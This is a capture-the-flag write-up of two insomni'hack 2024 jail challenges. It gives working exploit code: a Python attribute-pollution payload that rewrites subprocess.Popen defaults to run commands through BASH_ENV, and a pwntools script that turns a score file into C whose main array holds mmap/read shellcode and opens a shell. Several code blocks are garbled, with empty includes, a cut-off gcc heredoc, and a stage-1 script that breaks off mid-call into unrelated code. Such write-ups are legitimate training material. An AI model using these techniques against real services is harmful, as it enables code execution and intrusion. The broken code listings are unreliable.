# insomni'hack teaser 2024

i, for one, am not afraid to seek answers to life's toughest questions like "how well can a team of 2 people do in a 24 hour ctf when they start almost 12 hours late"

![a screenshot of all the challenges, we solved 8/14 not counting "welcome"](https://git.lain.faith/haskal/writeups/raw/branch/main/2024/inso/chals.png)

this is like, not bad actually???

anyway, let's talk about jails

- [misc: PPP](#ppp)
- [misc: terminal pursuit](#terminal-pursuit)

## PPP

(there was no flavor text for this one, it was just a flavor image of rihanna and i'm not gonna like go download it and then rehost it here so just imagine that's what's here)

[files](https://git.lain.faith/haskal/writeups/src/branch/main/2024/inso/ppp)

we can see immediately that the flag is inaccessible to the challenge user, and the only way to get it is to execute the command `/readflag Please` (immediately because i just like, ran the binary and found out that's what it does. i didn't bother reversing it at all)

here's the code for the challenge server

```python
from os import popen
import hashlib, time, math, subprocess, json

def response(res):
    print(res + ' | ' + popen('date').read())
    exit()

def generate_nonce():
    current_time = time.time()
    rounded_time = round(current_time / 60) * 60 # Round to the nearest 1 minutes (60 seconds)
    return hashlib.sha256(str(int(rounded_time)).encode()).hexdigest()

def is_valid_proof(data, nonce):
    DIFFICULTY_LEVEL = 6
    guess_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
    return guess_hash[:DIFFICULTY_LEVEL] == '0' * DIFFICULTY_LEVEL

class Blacklist:
    def __init__(self, data, nonce):
        self.data = data
        self.nonce = nonce

    def get_data(self):
        out = {}
        out['data'] = self.data if 'data' in self.__dict__ else ()
        out['nonce'] = self.nonce if 'nonce' in self.__dict__ else ()
        return out

def add_to_blacklist(src, dst):
    for key, value in src.items():
        if hasattr(dst, '__getitem__'):
            if dst[key] and type(value) == dict:
                add_to_blacklist(value, dst.get(key))
            else:
                dst[key] = value
        elif hasattr(dst, key) and type(value) == dict:
            add_to_blacklist(value, getattr(dst, key))
        else:
            setattr(dst, key, value)

def lists_to_set(data):
    if type(data) == dict:
        res = {}
        for key, value in data.items():
            res[key] = lists_to_set(value)
    elif type(data) == list:
        res = ()
        for value in data:
            res = (*res, lists_to_set(value))
    else:
        res = data
    return res

def is_blacklisted(json_input):
    bl_data = blacklist.get_data()
    if json_input['data'] in bl_data['data']:
        return True
    if json_input['nonce'] in bl_data['nonce']:
        return True
    json_input = lists_to_set(json_input)
    add_to_blacklist(json_input, blacklist)
    return False

if __name__ == '__main__':
    blacklist = Blacklist(['dd9ae2332089200c4d138f3ff5abfaac26b7d3a451edf49dc015b7a0a737c794'], ['2bfd99b0167eb0f400a1c6e54e0b81f374d6162b10148598810d5ff8ef21722d'])
    try:
        json_input = json.loads(input('Prove your work 😼\n'))
    except Exception:
        response('no')
    if not isinstance(json_input, dict):
        response('message')
    data = json_input.get('data')
    nonce = json_input.get('nonce')
    client_hash = json_input.get('hash')
    if not (data and nonce and client_hash):
        response('Missing data, nonce, or hash')
    server_nonce = generate_nonce()
    if server_nonce != nonce:
        response('nonce error')
    if not is_valid_proof(data, nonce):
        response('Proof of work is invalid')
    server_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
    if server_hash != client_hash:
        response('Hash does not match')
    if is_blacklisted(json_input):
        response('blacklisted PoW')
    response('Congratulation, You\'ve proved your work 🎷🐴')
```

there's a proof-of-work segment (sigh), checking that your input doesn't belong to a set of disallowed inputs and then...seemingly nothing!

### where's the primitive???

normally what i'll loosely call "pyjail" style challenges have some sort of core execution primitive like doing an eval on user-supplied code, subject to some sandboxing, or maybe AST sanitization, or perhaps being able to replace bytecode on function objects. this code is interesting because it doesn't do any of that, yet we can assume that at some point we gain the ability to execute `/readflag Please` to read the flag

instead, after verifying the proof of work, it goes through the following functions

- `is_blacklisted`
  - transformed by `lists_to_set`
    - this function converts any lists nested at any level in the data structure to tuples
    - there's literally no need for this for normal functioning of the server, so we could assume it's an important part of the solution. (this turns out to be correct)
  - processed by `add_to_blacklist`
    - this merges the user input with the `Blacklist` object instance recursively, handling dicts and object attributes along the way

when something looks weird it's worth thinking about it because that can help greatly narrow the search space for a solution. in this case, we can assume that solutions would involve tuples somehow, because we're given this primitive that serves no other useful purpose than to produce tuples

so the primitive is assignment to values at any depth of objects reachable from the starting object instance, of any type supported by json

the targets of this primitive are any object that can be found by recursively traversing using

- dict lookups
- attribute lookups

and the values that can be changed or added are

- `None`
- strings
- ints and floats
- booleans
- dicts of any of this
- tuples of any of this

an important thing we *can't* do is take some other existing runtime value and assign it somewhere: every value we write has to come straight from our json. in other words, this is a write-only primitive

### fucking around in ipython

a good approach to pyjails is press the `.` key and then hit tab a bunch of times in ipython. seriously.
so let's go do that for a second

```python
Python 3.11.6 (main, Nov 14 2023, 09:36:21) [GCC 13.2.1 20230801]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.18.1 -- An enhanced Interactive Python. Type '?' for help.

[ins] In [1]: import ppp

[ins] In [2]: obj = ppp.Blacklist(['x'], ['y'])

[ins] In [3]: obj.__
```

the object has its usual defined attributes, and then the set of python intrinsic double underscore attributes. the goal here is to get a reference to anything interesting, with a specific focus on stuff that is tuples

unfortunately the object itself is not that interesting. `__class__` is a useful thing to get references to other random stuff but we get stuck at the `__subclasses__()` barrier because that's a function and we can't call functions. most of this stuff is also read-only, so that doesn't help us either

let's look at the function `get_data`

```python
[ins] In [3]: obj.get_data.__
```

i was expecting there to be like `__code__` in here but there *wasn't*. so i quickly learned that this is a bound instance of the underlying function, which python has a dedicated object for, and the underlying function can be accessed with `__func__`

```python
[ins] In [3]: obj.get_data.__func__.__
```

so there's the `__code__` attribute which can be used to replace the bytecode of the function, but only by calling its `replace` function; the attributes can't be written directly. there's some other stuff in here but it's mostly function calls and not that interesting.
`__module__` would be nice if it were a reference *to the actual module* and not just the name of it but oh well

one thing i found here that is really interesting is `__defaults__` and `__kwdefaults__`

### `__defaults__`

`__defaults__` stores the default arguments for the function, if it was defined with default arguments

```python
[ins] In [1]: def my_func(a="default value"):
         ...:     print(a)
         ...:

[ins] In [2]: my_func.__defaults__
Out[2]: ('default value',)
```

`__kwdefaults__` similarly holds the defaults for keyword-only arguments

notice how `__defaults__` takes a tuple. *and it's settable*

```python
[ins] In [3]: my_func.__defaults__ = ("lol hacked",)

[ins] In [4]: my_func()
lol hacked
```

it's all coming together,,,

unfortunately `get_data` doesn't take any arguments. so we'll have to find something else to do this on

### going deeper

backtracking, there is one more useful key in the function's attributes: `__globals__`

```python
[ins] In [3]: obj.get_data.__func__.__globals__
{
 [...snip...]
 'popen': ,
 'hashlib': ,
 'time': ,
 'math': ,
 'subprocess': ,
 'json': ,
 'response': ,
 'generate_nonce': ,
 'is_valid_proof': ,
 'Blacklist': ppp.Blacklist,
 'add_to_blacklist': ,
 'lists_to_set': ,
 'is_blacklisted': }
```

neat

remember that the goal is to execute a command with an argument. taking a look at the actual `ppp` module the only remotely similar thing is the call to `popen` in the `response` function. we also see that `subprocess` is imported but not used (huh i wonder why that is,). so we have `popen` in scope here

let's try to bonk it

```python
# VxWorks has no user space shell provided. As a result, running
# command in a shell can't be supported.
if sys.platform != 'vxworks':
    # Supply os.popen()
    def popen(cmd, mode="r", buffering=-1):
        if not isinstance(cmd, str):
            raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
        if mode not in ("r", "w"):
            raise ValueError("invalid mode %r" % mode)
        if buffering == 0 or buffering is None:
            raise ValueError("popen() does not support unbuffered streams")
        import subprocess
        if mode == "r":
            proc = subprocess.Popen(cmd,
                                    shell=True, text=True,
                                    stdout=subprocess.PIPE,
                                    bufsize=buffering)
            return _wrap_close(proc.stdout, proc)
        else:
            proc = subprocess.Popen(cmd,
                                    shell=True, text=True,
                                    stdin=subprocess.PIPE,
                                    bufsize=buffering)
            return _wrap_close(proc.stdin, proc)
```

ok so let's just try to change the defaults

```python
[ins] In [1]: from os import popen

[ins] In [2]: popen.__defaults__ = ("/readflag Please", "r", -1)

[ins] In [3]: popen
Out[3]:

[ins] In [4]: popen("date").read()
Out[4]: 'Sun Jan 21 08:05:37 PM EST 2024\n'
```

so unfortunately when the cmd argument is provided, we can't override it using the defaults. this makes sense

`os.popen` uses `subprocess.Popen` internally. hey remember how `subprocess` is imported but never used so it's in the `__globals__`?? wow that sure is convenient! let's set defaults on `subprocess.Popen`

```python
class Popen:
    # ....
    def __init__(self, args, bufsize=-1, executable=None,
                 stdin=None, stdout=None, stderr=None,
                 preexec_fn=None, close_fds=True,
                 shell=False, cwd=None, env=None, universal_newlines=None,
                 startupinfo=None, creationflags=0,
                 restore_signals=True, start_new_session=False,
                 pass_fds=(), *, user=None, group=None, extra_groups=None,
                 encoding=None, errors=None, text=None, umask=-1, pipesize=-1,
                 process_group=None):
        """Create new Popen instance."""
        # ...
```

what we are provided is `args`, `shell`, `text`, `stdout`, and `bufsize`, so we can't override those.
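to make the chain so far concrete, here's a minimal local sketch. it reuses the challenge's `add_to_blacklist` as-is, but `launch` is a made-up stand-in for `subprocess.Popen.__init__` and the `Blacklist` here is trimmed down (both are assumptions for illustration, nothing actually gets executed). it shows the two rules in play: `__defaults__` only accepts a tuple, and a rewritten default only applies to parameters the caller leaves out

```python
# the challenge's merge routine, copied from the server code
def add_to_blacklist(src, dst):
    for key, value in src.items():
        if hasattr(dst, '__getitem__'):
            if dst[key] and type(value) == dict:
                add_to_blacklist(value, dst.get(key))
            else:
                dst[key] = value
        elif hasattr(dst, key) and type(value) == dict:
            add_to_blacklist(value, getattr(dst, key))
        else:
            setattr(dst, key, value)


# trimmed-down version of the challenge class, just enough to have a method
class Blacklist:
    def __init__(self, data, nonce):
        self.data = data
        self.nonce = nonce

    def get_data(self):
        return {"data": self.data, "nonce": self.nonce}


# hypothetical stand-in for subprocess.Popen.__init__ (not the real thing)
def launch(args, executable=None, env=None):
    return (args, executable, env)


# a list is refused outright, which is why the server's lists_to_set matters
try:
    launch.__defaults__ = ["/bin/bash", None]
    list_accepted = True
except TypeError:
    list_accepted = False

blacklist = Blacklist(["x"], ["y"])

# the merged input, shaped the way it looks after lists became tuples
polluted = {
    "get_data": {"__func__": {"__globals__": {"launch": {
        "__defaults__": ("/bin/bash", {"BASH_ENV": "/proc/self/fd/0"}),
    }}}}
}
add_to_blacklist(polluted, blacklist)

# the caller omits executable and env, so the rewritten defaults kick in
print(launch("date"))
# the caller supplies executable, so the rewritten default is ignored
print(launch("date", executable="/bin/sh"))
```

the walk goes bound method, then `__func__`, then the `__globals__` dict, then the target function, and only the final tuple value gets written with `setattr`.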
everything else in that signature is fair game though: we can assign a new default value to any parameter that `os.popen` doesn't pass

at this point we could try the basic approach of setting `executable` to `/readflag`, but since there is no control of the argument to `/readflag` this won't work. how else can we input a full command with an argument?

### to the bash man pages!

one possible way to control the behavior of the shell that is launched (we can choose `bash` or the default `sh` [`dash`] based on the `executable` parameter) is via environment variables

so i opened up the man page for bash..........and then i immediately gave up and just asked @rhelmot whether there was any cheese with bash environment variables you could do, and she offered up `BASH_ENV`

```text
BASH_ENV
       If this parameter is set when bash is executing a shell script, its value is interpreted as a
       filename containing commands to initialize the shell, as in ~/.bashrc. The value of BASH_ENV
       is subjected to parameter expansion, command substitution, and arithmetic expansion before
       being interpreted as a filename. PATH is not used to search for the resultant filename.
```

*unfortunately*, `BASH_ENV` needs to be a filename instead of just a list of commands. so to solve the issue of having a file @rhelmot suggested `/proc/self/environ`. unfortunately this doesn't work because the size of the file as reported by the kernel is 0, and bash actually uses that when reading it,

```bash
BASH_ENV=/proc/self/environ AAAA="$(printf '\n\necho hacked\n')" strace /bin/bash -c "date"
....
openat(AT_FDCWD, "/proc/self/environ", O_RDONLY) = 3
newfstatat(3, "", {st_mode=S_IFREG|0400, st_size=0, ...}, AT_EMPTY_PATH) = 0
read(3, "", 0) = 0
close(3) = 0
....
```

u_u

however there is another thing we can do which is to just use stdin, because the original stdin is still bound to the process that gets executed! so we can pass `BASH_ENV` as `/proc/self/fd/0` and then provide the additional command to run as input.
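a quick local check of this idea, as a sketch: it assumes a linux box with `bash` on the `PATH` and `/proc` mounted, and it uses `subprocess.run` with `input=` as a stand-in for the challenge's socket (the helper name and the `echo` commands are made up for the demo). `input=` writes the script to the child's stdin and then closes it, and that end-of-stream is what lets bash finish reading its "startup file"

```python
import os
import shutil
import subprocess


def run_with_stdin_as_bash_env(command, stdin_script):
    """Run `bash -c command` with BASH_ENV pointed at the child's own stdin."""
    env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        "BASH_ENV": "/proc/self/fd/0",
    }
    done = subprocess.run(
        ["bash", "-c", command],
        env=env,
        input=stdin_script,   # written to stdin, then stdin is closed (EOF)
        capture_output=True,
        text=True,
        timeout=10,
    )
    return done.stdout


# only attempt the demo where its assumptions hold
demo_possible = shutil.which("bash") is not None and os.path.isdir("/proc/self/fd")
output = ""
if demo_possible:
    output = run_with_stdin_as_bash_env("echo from the command", "echo from stdin\n")
    print(output)
```

if the assumptions hold, the output should contain both the line injected through stdin and the line from the original command.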
feeding `BASH_ENV` from stdin also requires us to call `shutdown` on the socket to the remote, so that the stream gets closed and bash sees the end of its input

### putting it together

assembly of the final exploit:

```python
popen_defaults = [-1, "/bin/bash", None, None, None, None, True, False, None,
                  {"BASH_ENV":"/proc/self/fd/0"}, None, None, 0, True, False, []]
```

this defines the defaults tuple that gets assigned to `Popen.__init__.__defaults__`, kept same as the original except for executable `/bin/bash` and environment with `BASH_ENV`. it's written as a list here because json has no tuples; the server's `lists_to_set` is what turns it into the tuple that `__defaults__` requires

```python
for _ in tqdm.trange(50000000):
    nonce = ppp.generate_nonce()
    data = secrets.token_hex(16)
    if ppp.is_valid_proof(data, nonce):
        break
else:
    raise Exception("oops")

hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
```

this generates the proof of work. we just steal the original code's nonce generator and validation function

```python
obj = {
    "data": data,
    "nonce": nonce,
    "hash": hash,
    "get_data": {
        "__func__": {
            "__globals__": {
                "subprocess": {
                    "Popen": {
                        "__init__": {
                            "__defaults__": popen_defaults
                        }
                    }
                }
            }
        }
    }
}
payload = json.dumps(obj)
```

this assembles the payload with the proof of work along with the attribute we're setting

the attribute written out is `.get_data.__func__.__globals__["subprocess"].Popen.__init__.__defaults__`

finally, we run the exploit

```python
print("running")
r = remote("ppp.insomnihack.ch", 12345)
print(r.recvline())
r.sendline(payload)
r.sendline("/readflag Please")
```

and here we call `shutdown` to close the stdin stream on the remote

```python
r.shutdown('send')
r.interactive()
```

normally, we should be done here, however this didn't seem to work on the remote

### that's right, get nagled

turns out the issue (probably?) was that somehow pwntools is not setting `TCP_NODELAY` and thus the stage 1 and stage 2 payloads were probably getting combined into the same packet or somehow not sent at all.
i had intuition for nagling being a thing that exists so i didn't debug this issue at all, i just added

```python
r.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
```

this made the exploit work at the time, though when testing it further i realized it's still kind of unstable, and i'm not actually sure how it managed to work the first time during the CTF. oh well. it works locally so i'm not super concerned

## terminal pursuit

it's a *makefile/c jail*

> During COVID a friend of mine decided to learn coding by implementing a game he loves: Trivial
> Pursuit. He started with C but, finding it too difficult, he switched to python midway through.
>
> Terminal Pursuit is the result of his work. I take no responsibility at all, all what I have done
> was dockerize the thing, it may be broken, I'll let you figure that out...
>
> `nc terminal-pursuit.insomnihack.ch 1337`

[files](https://git.lain.faith/haskal/writeups/src/branch/main/2024/inso/terminal)

there's a bunch of jail stuff that ends up being kind of unimportant, but after taking a look we can see the structure of the server

- `main.py`: contains the main interaction mode
- `quizzes/Makefile`: builds the quiz binaries (in C)
- `quizzes/*.c`: the quiz binaries
- `quizzes/pts.txt`: the score file appended to by the quiz binaries

### main.py

i've cut it down to just the most important parts

```python
alphabet = "abcdefghijklmnopqrstuvwxyz/,:;[]_-."
# ....
def get_user_string(text):
    print(text)
    s = input("> ").lower()
    for c in s:
        if c not in alphabet:
            exit(0)
    return s[:7]
```

this defines the allowed user input.
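as a sketch of what that filter lets through, the helper below re-implements the check as a pure function. the name `filter_input` and returning `None` instead of calling `exit(0)` are my assumptions, just to make it easy to poke at locally

```python
ALPHABET = "abcdefghijklmnopqrstuvwxyz/,:;[]_-."


def filter_input(raw):
    """Mirror get_user_string: lowercase, reject bad characters, keep 7 chars."""
    s = raw.lower()
    for c in s:
        if c not in ALPHABET:
            return None   # the real server calls exit(0) here
    return s[:7]


samples = ["books", "Books", "../flag", "user1", "a=b", "averylongname"]
for sample in samples:
    print(repr(sample), "->", repr(filter_input(sample)))
```

two things worth noticing: digits, `=`, spaces, braces, and parentheses are all rejected, and an over-long input made of allowed characters is truncated rather than rejected.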
all inputs get cut down to at most 7 characters, and every character has to come from the very restricted alphabet

```python
def run_quizz(username, category):
    command = f"make run quizz=\"{prefix + category}\" username=\"{username}\""
    os.system(command)

def play():
    username = get_user_string(gui.username)
    category = get_user_string(gui.category)
    run_quizz(username, category)
```

each quiz is run by prompting the user for their username, and the name of the quiz, and then calling `make` with the parameters. the makefile then builds and runs the specified quiz binary

```make
CC = gcc
CFLAGS = -x c -w

ifeq ($(findstring .,$(quizz)),)
override quizz:=$(quizz).c
endif

run: build
	@./run "$(username)"

build:
	@$(CC) $(CFLAGS) "$(quizz)" -o run
```

the makefile also appends a `.c` to the quiz name if it doesn't already have a `.` in it. additionally it uses the `-x c` parameter to force the source language to be C. it's interesting that it does this because the provided quizzes, `books.c`, `ctf.c`, and `miscgod.c` are all obviously C files, and the flag shouldn't be needed for those. let's make a note of this

here's an example of a quiz, in `books.c` (note only `books.c` and `miscgod.c` are defined, `ctf.c` doesn't contain any quiz code)

```c
// ...
const int LEN = 6;
const char *QUESTIONS[] = {
    // ...
};
const int SOLUTIONS[] = {
    1, 1, 1, 1, 1, 1,
};

/******************
 * Main
 ******************/
int main(int argc, char* argv[]) {
    setvbuf(stdout, NULL, _IONBF, 0);

    FILE *file;
    file = fopen(scores_file, "a");
    fprintf(file,"%s = {", argv[1]);

    int answer;
    int score = 0;
    for (int i = 0; i < LEN; i++) {
        printf("%s\n", QUESTIONS[i]);
        printf("Your answer: ");
        scanf("%d", &answer);
        if (answer == SOLUTIONS[i]) {
            score++;
            printf("Correct!\n\n");
        } else {
            printf("False!\n\n");
        }
        fprintf(file, "%d,", answer);
    }
    fprintf(file, "%d}\n", score);
    fclose(file);
}
```

we can see that the quiz asks the user for a series of answer inputs, reads them with `scanf("%d")`, and produces a score file consisting of the provided username, a list of the answers, and the final score. for example, if we play `books` as username `user`, the resulting `pts.txt` file will look like this

```
user = {1,2,3,4,5,6,1}
```

and that's it. that's all you get

### revisiting `-x c`

since there are no obvious code execution primitives in the code, we can assume that some trickery is needed to gain code execution. notice that `pts.txt` is in the `quizzes` directory. also, it's an allowed input because it's 7 chars and only uses allowed characters. what happens if we try to run the quiz `pts.txt`?

```bash
$ make username=user quizz=pts.txt
pts.txt:1:1: error: expected ‘,’ or ‘;’ at end of input
    1 | user = {1,2,3,4,5,6,1}
      | ^~~~
make: *** [Makefile:12: build] Error 1
```

huh, neat

the cflag `-x c` in the makefile ensures that gcc compiles `pts.txt` as if it was C source. now clearly as it stands it's not quite C, but maybe we can make this work

### when is main not a function

one thing that stands out here is the ability to assign a variable as a compound integer initializer. this can be used to define functions that are normally, y'know, functions, as arrays of integers, and it still works when compiled because gcc puts the integer bytes into the binary, and the integer bytes are valid instructions.
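a minimal sketch of the conversion that idea relies on: machine code bytes get padded to a multiple of 4 and reinterpreted as little-endian signed 32-bit ints (signed because the quiz reads its answers with `scanf("%d")`). the helper names and the 9-byte `exit(0)` stub are my own illustration, assuming x86-64 linux

```python
import struct


def code_to_ints(code: bytes) -> list[int]:
    """Pad to a multiple of 4 bytes and view as little-endian signed ints."""
    padded = code + b"\x00" * (-len(code) % 4)
    return list(struct.unpack(f"<{len(padded) // 4}i", padded))


def ints_to_code(values) -> bytes:
    """Inverse direction: the bytes gcc would emit for the initializer."""
    return struct.pack(f"<{len(values)}i", *values)


# mov eax, 60 ; xor edi, edi ; syscall   (i.e. exit(0))
exit_stub = bytes.fromhex("b83c000000" "31ff" "0f05")
ints = code_to_ints(exit_stub)
print("const int main[] = {" + ", ".join(map(str, ints)) + "};")
```

this prints `const int main[] = {15544, 268382464, 5};`, which happens to match the snippet closing out this post.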
see [main is usually a function. so then when is it not?](https://jroweboy.github.io/c/asm/2015/01/26/when-is-main-not-a-function.html)

that post comes up with the following

```c
const int main[] = {
    -443987883, 440, 113408, -1922629632,
    4149, 899584, 84869120, 15544,
    266023168, 1818576901, 1461743468, 1684828783,
    -1017312735
};
```

this actually compiles, and interestingly enough just `main = { .... };` still compiles, but doesn't run because `main` gets put in `.data` which is not normally executable. hence the `const` in the above example. that actually causes main to get put in `.rodata`

```bash
gcc -x c -w - <
```

```c
#include
#include
#include
#define rv(x) register uint64_t x asm(#x)
void test(){
    rv(rax) = SYS_mmap;
    rv(rdi) = 0;
    rv(rsi) = 4096;
    rv(rdx) = PROT_READ | PROT_WRITE | PROT_EXEC;
    rv(r10) = MAP_SHARED | MAP_ANONYMOUS;
    rv(r8) = -1;
    rv(r9) = 0;
    asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx),"r"(r10),
                 "r"(r8),"r"(r9):"memory");
    void (*tmp)(void) = (void*)rax;
    rdi = 0;
    rsi = rax;
    rax = 0;
    rdx = 4096;
    asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx):"memory");
    tmp();
}
```

this produces

```asm
test:
    mov eax, 9
    xor edi, edi
    mov esi, 4096
    or r8, -1
    mov edx, 7
    mov r10d, 33
    xor r9d, r9d
    syscall
    mov edx, 4096
    mov rcx, rax
    mov rsi, rax
    xor eax, eax
    syscall
    jmp rcx
```

it's 49 bytes. damn

there's a trick to save some more bytes which is to push `rax` after the `mmap` and `ret` at the end. this gets us down to 46 bytes

```asm
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rsi, rax
push rax
xor eax, eax
syscall
ret
```

and then the second stage is just the normal pwntools shellcode, which again, i didn't realize would have worked on its own. oh well

### fixing the formatting

so there's still the slight problem that the `pts.txt` file isn't quite valid C syntax as it stands. we can fix that, because we're allowed the `/` character, which means we can insert comments.
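to see why comments help, here's a sketch of the line a quiz binary appends for a given username, mirroring the `fprintf` calls in `books.c`. the helper names and the crude `//` stripping are assumptions for illustration (a real C compiler handles more cases, like `//` inside string literals)

```python
def score_line(username, answers, score):
    # mirrors fprintf("%s = {"), then "%d," per answer, then "%d}\n"
    return f"{username} = {{" + "".join(f"{a}," for a in answers) + f"{score}}}\n"


def strip_line_comment(line):
    # keep only what a C compiler would still see on this line
    return line.split("//", 1)[0].rstrip()


plain = score_line("user", [1, 2, 3, 4, 5, 6], 1)
commented = score_line("const//", [0, 0, 0, 0, 0, 0], 0)

print(plain, end="")
print(repr(commented))
print(repr(strip_line_comment(commented)))
```

with a username that ends in `//`, the ` = {...}` tail that the quiz always appends gets swallowed by the comment, so only the username itself survives as C source.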
additionally, we can use `;//` at the end to add the necessary semicolon (and comment out the rest)

for this we can use the usernames `const//`, `int//`, `main[]`, and `;//`, so the final points file will look like this

```c
const// = { ... }
int// = { ... }
main[] = { shellcode int values here }
;// = { ... }
```

this becomes a valid C file in the right format

### putting it together

```python
stage1 = """
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rsi, rax
push rax
xor eax, eax
syscall
ret
"""
stage1_bin = asm(stage1)
assert len(stage1_bin) == 46
stage1_bin = stage1_bin + b"\x00\x00"
stage1_payload = list(struct.unpack(" ", b"1")
r.sendlineafter(b"> ", game["username"].encode())
r.sendlineafter(b"> ", game["quiz"].encode())
if "answers" in game:
    for answer in game["answers"]:
        r.sendlineafter(b"answer: ", str(answer).encode())
else:
    r.send(game["rawinput"])
```

finally, we define the utility function to play a game from a given game specification, and then run the exploit

```python
def run(host="localhost"):
    r = remote(host, 1337)
    for game in games:
        play_game(r, game)
    r.interactive()
```

this should pop a shell, and from there the flag can be read out

## conclusion

ctfs can often have really bad misc categories. misc is known to be plagued with annoying gamey challenges and this can make a ctf pretty frustrating to play. but i can solidly say that the insomni'hack teaser wasn't one of these ctfs

both of these misc challenges were really interesting and presented novel exploitation paths that needed to work around very tight constraints. and solving them was a lot of fun

```c
const int main[] = {15544, 268382464, 5};
```